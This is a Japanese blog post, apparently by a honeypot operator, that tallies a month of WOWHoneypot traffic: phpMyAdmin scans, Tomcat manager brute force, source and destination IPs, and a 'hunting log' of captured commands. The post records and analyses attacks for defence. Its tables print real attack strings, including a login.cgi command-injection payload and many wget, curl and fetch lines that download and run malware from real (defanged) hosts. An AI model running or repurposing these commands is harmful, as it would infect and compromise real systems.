2018年6月度のWOWHoneypotのアクセスまとめ
遅くなりましたが、2018年6月(5-30)までの1ヶ月間のアクセスログの統計を取りました。
まずは、6月の総アクセス件数は7598件です。
では、いつものmethod+pathによる統計(top20)です。
method | path | count |
GET | / | 1643 |
GET | /manager/html | 1336 |
HEAD | / | 651 |
POST | /command.php | 612 |
GET | /index.action | 103 |
GET | /login.cgi?cli=aa%20aa%27;wget%20hxxp://185.62.190[.]191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ | 84 |
GET | /index.php | 65 |
GET | /pmamy2/index.php | 61 |
GET | /phpMyAdmin/index.php | 58 |
GET | /mysql-admin/index.php | 58 |
GET | /db/index.php | 58 |
GET | /admin/mysql/index.php | 58 |
GET | /pmd/index.php | 57 |
GET | /pma/index.php | 57 |
GET | /phpmyadmin1/index.php | 57 |
GET | /phpmyadmin/index.php | 57 |
GET | /phpmyadmin-old/index.php | 56 |
GET | /admin/index.php | 56 |
GET | /PMA2/index.php | 56 |
GET | /myadmin/index.php | 55 |
なお、PMA関連と思われるパスにpを含みindex.phpを含むアクセスであれば、1664件ですやはり、phpMyAdmin関連のスキャンは大量でした。
ただ、それの次の規模がtomcatの管理画面へのブルートフォース攻撃の1336件です。
ほぼ一日のブルートフォースでそれなりの件数を出しており、ハニポのサンプル数が少ない分、スパイクは大きくなってしまいます。
次に、送信元IPの統計です。あまり、何かが見えるとは思っていないですが…。
srcIP | count |
187.75.224.xx | 1209 |
203.90.230.xx | 545 |
191.190.27.xx | 156 |
189.100.133.xx | 156 |
179.154.248.xx | 156 |
177.35.49.xx | 156 |
200.79.176.xx | 95 |
218.93.207.xx | 94 |
118.184.27.xx | 94 |
120.198.17.xx | 93 |
140.143.65.xx | 92 |
116.196.106.xx | 92 |
115.29.47.xx | 92 |
61.181.xx | 86 |
115.159.151.xx | 86 |
120.79.144xx | 85 |
103.82.52.xx | 85 |
47.90.102.xx | 84 |
また、宛先の統計です。IP以外のものは、たいてい不正中継の調査です。
dstIP | count |
(IP):80 | 6013 |
blank:80 | 1391 |
127.0.0.1:80 | 97 |
localhost:80 | 30 |
(IP):443 | 16 |
(host):80 | 12 |
どこかのドメイン:80 | 17 |
どこかのIP:83 | 12 |
どこかのIP:80 | 6 |
ハンティングログの統計は以下です。
84 | wget hxxp://185.62.190.191/r15 wget -c hxxp://wap.tfddos.net:57843/linux 6 wget -c hxxp://119.188.247.73:5858/tatada |
5 | wget -c hxxp://119.188.247.73:5858/88888syzz |
4 | wget -O nmlt1.sh hxxp://domstates.su/nmlt1.sh |
4 | wget -c hxxp://119.188.247.73:5858/TTTUS2 |
3 | wget -P /tmp hxxp://hfs.mhacker.cc:9278/Linux.server 3 wget -c hxxp://aaa.linuxa.club:57843/linux |
2 | wget -c hxxp://60.250.99.131:9998/liux |
1 | wget --user-agent ""linux"" -O - hxxp://107.181.174.232/lin/st.sh |
1 | wget -qO - hxxp://128.199.251.119/gpon.php |
1 | wget hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr ; curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr |
1 | wget hxxp://217.61.6.127/t |
1 | wget -c hxxp://23.249.162.123:9998/servic |
1 | fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr |
1 | curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr |